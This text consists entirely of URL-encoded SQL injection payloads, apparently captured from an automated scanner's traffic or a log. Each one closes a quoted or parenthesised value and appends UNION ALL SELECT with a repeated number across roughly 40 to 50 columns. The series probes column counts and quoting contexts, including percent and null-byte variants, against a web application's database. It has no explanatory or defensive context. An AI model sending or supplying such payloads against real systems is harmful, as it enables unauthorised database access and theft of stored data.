-1754%22%20UNION%20ALL%20SELECT%203689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689%2C3689--%20 -5638%22%20UNION%20ALL%20SELECT%209568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568%2C9568--%20 -6370%22%20UNION%20ALL%20SELECT%209613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613%2C9613--%20 -6730%22%20UNION%20ALL%20SELECT%203220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220%2C3220--%20 -6299%22%20UNION%20ALL%20SELECT%208703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703--%20 -6992%25%27%29%20UNION%20ALL%20SELECT%208172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172%2C8172--%20 -4800%25%27%29%20UNION%20ALL%20SELECT%206892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892%2C6892--%20 -1892%25%27%29%20UNION%20ALL%20SELECT%203030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030%2C3030--%20 -9184%25%27%29%20UNION%20ALL%20SELECT%202775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775%2C2775--%20 -2647%25%27%29%20UNION%20ALL%20SELECT%206534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534%2C6534--%20 -6696%25%27%29%20UNION%20ALL%20SELECT%208839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839%2C8839--%20 -1765%25%27%29%20UNION%20ALL%20SELECT%207163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163%2C7163--%20 -9227%25%27%29%20UNION%20ALL%20SELECT%201054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054%2C1054--%20 -9359%25%27%29%20UNION%20ALL%20SELECT%202979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979%2C2979--%20 -5271%25%27%29%20UNION%20ALL%20SELECT%209961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961%2C9961--%20 -3630%25%27%29%29%20UNION%20ALL%20SELECT%204186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186%2C4186--%20 -9650%25%27%29%29%20UNION%20ALL%20SELECT%205590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590--%20 -3592%25%27%29%29%20UNION%20ALL%20SELECT%207659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659--%20 -6852%25%27%29%29%20UNION%20ALL%20SELECT%207654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654%2C7654--%20 -4446%25%27%29%29%20UNION%20ALL%20SELECT%202196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196%2C2196--%20 -9896%25%27%29%29%20UNION%20ALL%20SELECT%209644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644%2C9644--%20 -9985%25%27%29%29%20UNION%20ALL%20SELECT%204951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951%2C4951--%20 -9941%25%27%29%29%20UNION%20ALL%20SELECT%201454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454%2C1454--%20 -9035%25%27%29%29%20UNION%20ALL%20SELECT%209741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741%2C9741--%20 -3487%25%27%29%29%20UNION%20ALL%20SELECT%203424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424%2C3424--%20 -6582%25%27%29%29%29%20UNION%20ALL%20SELECT%206079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079%2C6079--%20 -6655%25%27%29%29%29%20UNION%20ALL%20SELECT%209436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436%2C9436--%20 -5098%25%27%29%29%29%20UNION%20ALL%20SELECT%205031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031%2C5031--%20 -6038%25%27%29%29%29%20UNION%20ALL%20SELECT%203311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311%2C3311--%20 -8127%25%27%29%29%29%20UNION%20ALL%20SELECT%204069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069--%20 -4359%25%27%29%29%29%20UNION%20ALL%20SELECT%204862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862%2C4862--%20 -9717%25%27%29%29%29%20UNION%20ALL%20SELECT%208652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652%2C8652--%20 -4739%25%27%29%29%29%20UNION%20ALL%20SELECT%207917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917%2C7917--%20 -8754%25%27%29%29%29%20UNION%20ALL%20SELECT%208306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306%2C8306--%20 -6741%25%27%29%29%29%20UNION%20ALL%20SELECT%208060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060%2C8060--%20 -8006%25%27%20UNION%20ALL%20SELECT%206342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342%2C6342--%20 -4525%25%27%20UNION%20ALL%20SELECT%201122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122%2C1122--%20 -3719%25%27%20UNION%20ALL%20SELECT%204045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045%2C4045--%20 -9056%25%27%20UNION%20ALL%20SELECT%207494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494--%20 -6406%25%27%20UNION%20ALL%20SELECT%207651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651%2C7651--%20 -8510%25%27%20UNION%20ALL%20SELECT%203892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892%2C3892--%20 -8269%25%27%20UNION%20ALL%20SELECT%203200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200%2C3200--%20 -7725%25%27%20UNION%20ALL%20SELECT%203009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009--%20 -7037%25%27%20UNION%20ALL%20SELECT%201216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216--%20 -2331%25%27%20UNION%20ALL%20SELECT%208459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459%2C8459--%20 -8437%00%27%29%20UNION%20ALL%20SELECT%204660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660%2C4660--%20 -6876%00%27%29%20UNION%20ALL%20SELECT%202970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970%2C2970--%20 -7947%00%27%29%20UNION%20ALL%20SELECT%203898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898%2C3898--%20 -6647%00%27%29%20UNION%20ALL%20SELECT%205471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471%2C5471--%20 -3013%00%27%29%20UNION%20ALL%20SELECT%203301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301--%20 -2509%00%27%29%20UNION%20ALL%20SELECT%201793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793--%20 -4089%00%27%29%20UNION%20ALL%20SELECT%204215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215%2C4215--%20 -1824%00%27%29%20UNION%20ALL%20SELECT%203793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793%2C3793--%20 -1906%00%27%29%20UNION%20ALL%20SELECT%204604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604%2C4604--%20 -7741%00%27%29%20UNION%20ALL%20SELECT%203774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774%2C3774--%20 -7113%00%27%20UNION%20ALL%20SELECT%204962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962%2C4962--%20 -6025%00%27%20UNION%20ALL%20SELECT%209170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170%2C9170--%20 -6784%00%27%20UNION%20ALL%20SELECT%208524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524%2C8524--%20 